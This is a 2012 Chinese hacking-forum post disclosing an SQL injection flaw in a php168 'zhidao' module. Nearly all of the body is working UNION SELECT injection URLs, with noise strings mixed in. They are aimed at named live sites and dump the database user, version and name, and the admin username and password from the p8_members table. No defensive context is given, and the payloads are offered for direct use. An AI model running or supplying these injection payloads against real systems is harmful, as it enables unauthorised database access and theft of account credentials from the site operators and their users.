找回密码
 立即注册
查看: 3804|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--; J; z) ^6 S9 h% @. H4 H3 E# ^+ @
                                                         
, b, i% p( d; K0 d4 n/ F& W                                       ( ?% c& U, w0 q; ^
9 d( z; ~& u6 w
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--( V6 H8 T0 y. \
                                                     + {4 O1 m6 Y8 z" ]# @' ~) u
                                                                   1 i- E7 A. ~2 N/ o1 y
                                                        9 K: v' x# ^- A+ f) W! z
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
5 W& O- R" A, s( {9 v  M# D" o7 H/ ^: ]

) B9 B4 \" f* B. _! q! V3 |
; w% R! z: o, q                                                            1 p& u" H3 J1 R9 B9 X# }7 C
# g# q7 E) R1 v4 P+ m) v. t# l
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
! e& V0 a( w: t6 s. \5 F! s5 \/ B* J8 A
/ j0 m! u3 ?- L) \8 A
) Z; m! _- E0 ?5 E, W( B5 |
) h; V/ p# _4 v$ E2 q; O: u                                                                    
8 u2 R  l( ~) d2 e4 e& v. _) k7 m

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表